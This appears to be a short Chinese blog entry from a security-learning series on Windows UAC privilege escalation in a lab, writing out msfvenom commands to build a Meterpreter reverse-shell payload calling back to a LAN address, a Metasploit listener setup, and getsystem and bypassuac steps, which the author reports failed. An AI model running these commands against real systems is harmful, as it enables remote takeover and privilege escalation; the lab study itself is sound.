美文网首页
网络安全-Day49-windows提权(UAC)

网络安全-Day49-windows提权(UAC)

作者: K8s_Docker | 来源:发表于2020-05-07 22:06 被阅读0次

windows UAC提权

1、生成payload.exe,并下载(msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.234 LPORT=6688 -f exe -o payload.exe)

2、进入msf,设置监听

命令:

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.31.218

set lport 6688

exploit

在虚拟机中运行payload.exe

3、提权

    3.1、用getsystem命令提权(提权失败了,换3.3方法提权)

    3.2、退出当前恢复(background),查看监听会话(sessions -i)

    3.3、绕过UAC进行提权(本次实验没成功,如果成功的话会返回  meterpreter>   会话)

命令:

use exploit/windows/local/bypassuac

set session 1

exploit

用 getuid命令查看当前用户权限

相关文章

网友评论

      本文标题:网络安全-Day49-windows提权(UAC)

      本文链接:https://www.haomeiwen.com/subject/lsjaghtx.html